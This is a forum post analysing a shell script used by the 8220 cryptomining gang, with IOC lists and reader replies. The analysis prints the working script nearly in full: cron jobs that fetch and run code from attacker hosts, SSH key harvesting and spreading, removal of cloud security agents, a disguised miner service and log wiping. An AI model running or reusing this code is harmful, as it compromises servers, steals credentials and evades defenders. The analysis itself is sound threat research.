Hk_Mayfly 发表于 2021-11-9 14:51

新·8220挖矿团伙样本分析报告

# 前言

在队里看见一个IOC信息`http://192.210.200.66:1234/xmss`,溯源后发现是8220挖矿团伙的挖矿脚本,于是拿下来进行分析。



# 溯源

IP信息

| 参数   | 值                                                         |
| -------- | ------------------------------------------------------------ |
| IP       | 192.210.200.66                                             |
| 地理位置 | 美国 伊利诺伊州 芝加哥                                       |
| ASN      | 36352                                                      |
| 注册机构 | ColoCrossing                                                 |
| 注册地址 | Brisbane, Australia, 澳大利亚                              |
| 开放端口 | 15, 22, 49, 80, 102, 123, 138, 443, 554, 902, 1110, 1177, 1234, 1458, 1515, 1604, 1972, 2067, 2082, 2121, 2727, 3338, 3350, 3371, 3374, 3386, 3397, 4022, 4040, 4592, 4911, 4991, 5353, 5357, 5900, 5901, 5984, 6000, 6001, 7676, 7777, 8009, 8080, 8087, 8090, 8098, 9051, 9160, 9333, 9943, 9981, 9999, 10051, 10250, 49152 |



反查域名信息:

```
apacheorg.top
w.apacheorg.top
agent.apacheorg.xyz
agent.apacheorg.top
apacheorg.xyz
w.apacheorg.xyz
```



涉及恶意文件

```
5d4f2a009db79009b1b86d416019d808
ca815ac01df52cd997ae83de9606d378
5efc68ad277fe3fc36bfdf7671d8b1de
d2f5ec8c97e56f11c5f517aed83ed8b2
3997fb6cd3b603aad1cd40360be6c205
47be2940ef6970954ce71e8ad6d74a74
b1582ac0cfbe7cef692d748d1bf4b4b3
```



# 挖矿脚本分析

既然先拿到脚本,就先对脚本各个函数梳理一遍。

## 关闭防火墙

`setenforce 0 2>/dev/null` 0表示关闭防火墙,2表示以stderr模式输出到`/dev/null`



## 优化性能

1. 设定最大打开文件数:`ulimit -n 65535`

2. 禁用防火墙:`ufw disable`

3. 允许恶意网络连接传输

   ```shell
   iptables -P INPUT ACCEPT
   iptables -P OUTPUT ACCEPT
   iptables -P FORWARD ACCEPT
   iptables -F
   ```

4. 修改最大内存页hugepages以提高性能:`echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf`

5. 禁用watchdog:`echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf`



## 清除同类挖矿样本

```shell
netstat -antp | grep ':3333'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':4444'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5555'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':7777'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':14444'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5790'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':45700'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':2222'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':9999'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':20580'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':13531'| awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '23.94.24.12'| awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '134.122.17.13'| awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '66.70.218.40'| awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '209.141.35.17'| awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
echo "123"
netstat -antp | grep '119.28.4.91'| awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '101.32.73.178'| awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk-F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
ps -fe | grep '/tmp' | grep -v '.rsyslogds'|grep -v '.libs'|grep -v grep| awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
ps aux | grep -a -E "kdevtmpfsi|rot|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9
```



## 设定Google公共DNS

```shell
if [ $(cat /etc/resolv.conf | grep 8.8.8.8|grep -v grep|wc -l) -eq '0' ];then
echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
else
echo "ok"
fi
```



## 卸载安全服务

### 卸载阿里云盾和监控服务,屏蔽阿里云盾IP

```shell
if ps aux | grep -i 'liyun'; then
    /etc/init.d/aegis uninstall
    (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    sudo pkill aliyun-service
    killall -9 aliyun-service
    sudo pkill AliYunDun
    killall -9 AliYunDun
    iptables -I INPUT -s 100.100.30.1/28 -j DROP
    iptables -I INPUT -s 140.205.201.0/28 -j DROP
    iptables -I INPUT -s 140.205.201.16/29 -j DROP
    iptables -I INPUT -s 140.205.201.32/28 -j DROP
    iptables -I INPUT -s 140.205.225.192/29 -j DROP
    iptables -I INPUT -s 140.205.225.200/30 -j DROP
    iptables -I INPUT -s 140.205.225.184/29 -j DROP
    iptables -I INPUT -s 140.205.225.183/32 -j DROP
    iptables -I INPUT -s 140.205.225.206/32 -j DROP
    iptables -I INPUT -s 140.205.225.205/32 -j DROP
    iptables -I INPUT -s 140.205.225.195/32 -j DROP
    iptables -I INPUT -s 140.205.225.204/32 -j DROP
    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
    rm -rf /usr/local/aegis*
    systemctl stop aliyun.service
    systemctl disable aliyun.service
    service bcm-agent stop
    yum remove bcm-agent -y
    apt-get remove bcm-agent -y
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove
    rm -rf /usr/local/cloudmonitor
```



### 卸载腾讯云镜

```shell
elif ps aux | grep -i 'unjing'; then
    process=(sap100 secu-tcs-agent sgagent64 barad_agent agent agentPlugInD pvdriver )
    for i in ${process[@]}
    do
      for A in $(ps aux | grep $i | grep -v grep | awk '{print $2}')
      do
      kill -9 $A
      done
    done
    chkconfig --level 35 postfix off
    service postfix stop
    /usr/local/qcloud/stargate/admin/stop.sh
    /usr/local/qcloud/stargate/admin/uninstall.sh
    /usr/local/qcloud/YunJing/uninst.sh
    /usr/local/qcloud/monitor/barad/admin/stop.sh
    /usr/local/qcloud/monitor/barad/admin/uninstall.sh
    rm -rf /usr/local/sa
    rm -rf /usr/local/agenttools
    rm -rf /usr/local/qcloud
    rm -f /etc/cron.d/sgagenttask
```



## 设定下载命令

```shell
if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB
```





## 定时脚本下载/更新,并执行

```shell
cronlow(){
cr=$(crontab -l | grep -q $url | wc -l)
# 检测crontab中是否有恶意脚本的下载/更新任务
if [ ${cr} -eq 0 ];then
    crontab -r
    (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab -
else
    echo "cronlow skip"
fi
}
```

将定时任务写入以下位置

```
/etc/cron.d/`whoami`
/etc/cron.d/apache
/var/spool/cron/`whoami`
/var/spool/cron/crontabs/`whoami`
/etc/cron.hourly/oanacroner1
```



```shell
cron(){
if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==\|bash.givemexyz.in\|205.185.116.78"
then
    chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
    crontab -r
fi
if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep "$url"
then
    echo "Cron exists"
else
    apt-get install -y cron
    yum install -y vixie-cron crontabs
    service crond start
    chkconfig --level 35 crond on
    echo "Cron not found"
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/`whoami`
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/`whoami`
    mkdir -p /var/spool/cron/crontabs
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/`whoami`
    mkdir -p /etc/cron.hourly
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down
    chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down
fi
chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down
}
```



## 搜集用户信息进行传播

搜集用户`ssh端口`,`用户列表`,`主机列表`,`登录凭证`信息,并尝试进行登录,然后下载下载执行`xmss`挖矿脚本

```shell
localgo() {
echo "localgo start"
myhostip=$(curl -sL icanhazip.com)
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "({1,3}\.){3}{1,3}")
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/+/\n&\n/;/^({1,3}\.){3}{1,3}\n/P;D' | awk '{print $1}')
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "({1,3}\.){3}{1,3}" | uniq)
HOSTS6=$(ps auxw | grep -oP "({1,3}\.){3}{1,3}" | grep ":22" | uniq)
USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
)
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
i=0
for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
      for sshp in $sshports; do
          ((i++))
          if [ "${i}" -eq "20" ]; then
            sleep 5
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi

          #Wait 5 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
      done
      done
    done
done
# scangogo
echo "local done"
}
```



## 安装挖矿服务

```shell
setupxmrservice(){
echo "[*] Removing previous c3pool miner (if any)"
if sudo -n true 2>/dev/null; then
    sudo systemctl stop c3pool_miner.service
fi
killall -9 xmrig

echo "[*] Removing $HOME/c3pool directory"
rm -rf $HOME/c3pool
mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
if [ $(netstat -antp|grep 'rsyslogds'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ];then
    $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
    # preparing script

    echo "[*] Creating $HOME/c3pool/miner.sh script"
    mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
    chmod +x /usr/sbin/.rsyslogds.sh
    /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
    # preparing script background work and work under reboot
    if ! grep .rsyslogds.sh $HOME/.profile >/dev/null; then
      echo "[*] Adding $HOME/c3pool/miner.sh script to $HOME/.profile"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>$HOME/.profile
    else
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

    if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then
      echo "[*] Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>/etc/rc.d/rc.local
    else
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

    if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
      echo "[*] Enabling huge pages"
      echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
      sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
    fi

    if ! type systemctl >/dev/null; then

      echo "[*] Running miner in the background (see logs in $HOME/c3pool/xmrig.log file)"
      /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
      echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
      echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."

    else

      echo "[*] Creating c3pool_miner systemd service"
      sudo mv /tmp/rsyslogds.service /etc/systemd/system/rsyslogds.service
      echo "[*] Starting c3pool_miner systemd service"
      sudo killall xmrig 2>/dev/null
      sudo systemctl daemon-reload
      sudo systemctl enable rsyslogds.service
      sudo systemctl start rsyslogds.service
      echo "To see miner service logs run \"sudo journalctl -u c3pool_miner -f\" command"
    fi
fi
}
```

这里安装了挖矿程序`e5c3720e14a5ea7f678e0a9835d28283`



# 恶意脚本整体流程分析

```shell
# 杀掉阿里云云盾、腾讯云镜
der

if [ -w /usr/sbin ]; then
    SPATH=/usr/sbin
else
SPATH=/tmp
fi
echo $SPATH

# 创建.rsyslogds.sh文件,最后启动挖矿服务用到
cat >/tmp/.rsyslogds.sh <<EOL
#!/bin/bash
# 文件v中是MD5嘛,用以校验.rsyslogds文件的MD5值
x_md51 = `curl http://agent.apacheorg.xyz:1234/v`
x_md52 = `md5sum /usr/sbin/.rsyslogds| awk '{print $1}'`
# 校验MD5
if [ "$x_md52" = "$x_md51" ]; then
# 如果.rsyslogds在进程中没有启动,则启动.rsyslogds
if ! pidof .rsyslogds >/dev/null; then
    /usr/sbin/.rsyslogds
fi
else
# 如果MD5不相同,则从远端下载.rsyslogds程序,并杀掉非真.rsyslogds,运行真.rsyslogds
$DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
pkill .rsyslogds
/usr/sbin/.rsyslogds
fi
EOL

# 创建rsyslogds守护进程
cat >/tmp/rsyslogds.service <<EOL

Description=rsyslogdservice

ExecStart=/usr/sbin/.rsyslogds
Restart=always
Nice=10
CPUWeight=1

WantedBy=multi-user.target
EOL

MD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283"
MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`

# 这里看有没有这个路径,没有路径表明肯定没有.rsyslogds文件
if [ "$SPATH" = "/usr/sbin" ]
then
# 同样这,本地校验.rsyslogds, 的MD5值这里应该写错了,应该是不等于
if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]
then
    # .rsyslogds文件MD5相同,下载并运行.rsyslogds
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    # 启动挖矿服务
    setupxmrservice
    # 搜集ssh端口、用户列表、主机列表、凭证列表进行登录,传播挖矿脚本
    localgo
    # 设定脚本下载/更新的定时任务
    cron
else
    # 运行挖矿程序
    $SPATH/.rsyslogds
    # 启动服务
    setupxmrservice
    # 搜集ssh端口、用户列表、主机列表、凭证列表进行登录,传播挖矿脚本
    localgo
    # 设定脚本下载/更新的定时任务
    cron
fi
else
# 下载并运行恶意程序.rsyslogds
$DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
# 设置脚本执行的定时任务
cronlow
fi

# 脚本会检查.inis文件是否存在,不存在就从远端下载后拖到后台运行
if [ $(ps aux|grep inis|grep -v grep|wc -l) -eq '0' ];
then
$DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
cd $SPATH
nohup ./.inis &
else
echo "ok"
fi

history -c
der
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cronrot
echo 0>~/.bash_history
```



## .inis文件

```shell
#!/bin/bash
if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB
if [ -w /usr/sbin ]; then
SPATH=/usr/sbin
else
SPATH=/tmp
fi
kill(){
ps aux | grep -v '.rsyslogds' |grep -v '.libs'| grep -v grep | awk '{if($3>50.0) print $2}' | while read procid
do
    kill -9 $procid
done
}
while true; do
ipurl="http://agent.apacheorg.top:1234"
MD5_1_XMR = `curl -fsSL $ipurl/v||wget -q -O - $ipurl/v`
MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`
# 这里我怀疑也是写错了,应该是不等于
if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]; then
    if [ $(ps -aux|grep '.rsyslogds'|grep -v grep|wc -l) -eq '0' ];then
      $SPATH/.rsyslogds
    else
      echo "ok"
    fi
else
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    chattr +ai $SPATH/.rsyslogds
fi
kill
sleep 1m
done

```



# 挖矿程序分析:.rsyslogds

## 基本信息

| 参数   | 值                                                         |
| -------- | ------------------------------------------------------------ |
| 文件名   | .rsyslogds                                                   |
| MD5      | e5c3720e14a5ea7f678e0a9835d28283                           |
| SHA256   | 86843e8a0b7079ab20e0f258600ef597b04ffc35d8a706d250e4122bd1cc4692 |
| 文件类型 | ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), statically linked, stripped |
| 文件大小 | 2077172 bytes                                                |
| 其他信息 | upx                                                          |



## 程序分析

upx脱壳后,打开发现

!![](https://pic.imgdb.cn/item/618903422ab3f51d916c36c6.png)

这就是用的现成的`XMRig`挖矿项目编译,版本为`6.7.1`,编译日期为`2021/01/12`

![](https://pic.imgdb.cn/item/618903422ab3f51d916c36bc.png)

提取到钱包地址:`48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF`



# IOC信息

```shell
MD5
e5c3720e14a5ea7f678e0a9835d28283
51cf7dde4003aa6901918e373bf91b18
01972190a83b183b56064d82045de8d6
caa9ea2c522fc6268c7e976142d48775

IP
205.185.113.151
194.156.99.30
5.196.247.12
205.185.116.78
192.210.200.66

domain
bash.givemexyz.xyz
bash.givemexyz.in
agent.apacheorg.top

URL
http://192.210.200.66:1234/xmss
http://192.210.200.66:1234/v
http://192.210.200.66:1234/.rsyslogds
http://192.210.200.66:1234/.inis
http://205.185.113.59:1234/xmss
http://205.185.113.59:1234/v
http://205.185.113.59:1234/.rsyslogds
http://205.185.113.59:1234/.inis
http://agent.apacheorg.top:1234/v
http://agent.apacheorg.top:1234/xmss
http://agent.apacheorg.top:1234/.rsyslogds
http://agent.apacheorg.top:1234/.inis

钱包地址
48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF
```

zich123 发表于 2021-11-9 15:37

这脚本最重要的门罗钱包地址居然少了一位...

此ID不存在 发表于 2021-11-9 15:11

本帖最后由 此ID不存在 于 2021-11-9 17:46 编辑

卡巴斯基对此页面报毒
事件: 检测到恶意对象
用户: LAPTOP-UOAGND7N\ThinkPad
用户类型: 活动用户
应用程序名称: msedge.exe
应用程序路径: C:\Program Files (x86)\Microsoft\Edge\Application
组件: 网页反病毒
结果说明: 检测到
类型: 木马
名称: HEUR:Trojan-Downloader.Shell.Miner.gen
精确度: 不确切
威胁级别: 高
对象类型: 文件
对象名称: thread-1540889-1-1.html
对象路径: https://www.52pojie.cn
MD5: 9D1AE8F86D163B6E42408B3C5E5EE7BF
原因: 专家分析
数据库发布日期: 昨天,2021/11/8 23:37:00


允许后提示检测到威胁


事件: 检测到恶意对象
用户: LAPTOP-UOAGND7N\ThinkPad
用户类型: 活动用户
应用程序名称: msedge.exe
应用程序路径: C:\Program Files (x86)\Microsoft\Edge\Application
组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: HEUR:Trojan-Downloader.Shell.Miner.gen
精确度: 不确切
威胁级别: 高
对象类型: 文件
对象名称: f_0011ea
对象路径: C:\Users\ThinkPad\AppData\Local\Microsoft\Edge\User Data\Default\Cache
MD5: 22859EB6103A289BCA594D71AF120150
原因: 专家分析
数据库发布日期: 昨天,2021/11/8 23:37:00

limit7 发表于 2021-11-9 17:52

对页面报毒?这是什么操作

chuxia12 发表于 2021-11-9 15:09

虽然看不懂,但是大佬nb

Hk_Mayfly 发表于 2021-11-9 15:26

此ID不存在 发表于 2021-11-9 15:11
卡巴斯基对此页面报毒

允许后提示检测到威胁

这是下载挖矿脚本的路径,下载后别运行就行。

墨白先生 发表于 2021-11-9 15:35

虽然看不懂,但是大佬nb

Hao轩 发表于 2021-11-9 16:15

挖矿 遇到后电脑会明显变卡 希望各位也要注意防范吧

Bboxer 发表于 2021-11-9 16:25

虽然看不懂,但是大佬nb

Scy_91888 发表于 2021-11-9 16:27

感谢分享,先收藏了。

DbQ 发表于 2021-11-9 16:45

我看不懂但我大为震撼
页: [1] 2 3 4 5 6 7 8
查看完整版本: 新·8220挖矿团伙样本分析报告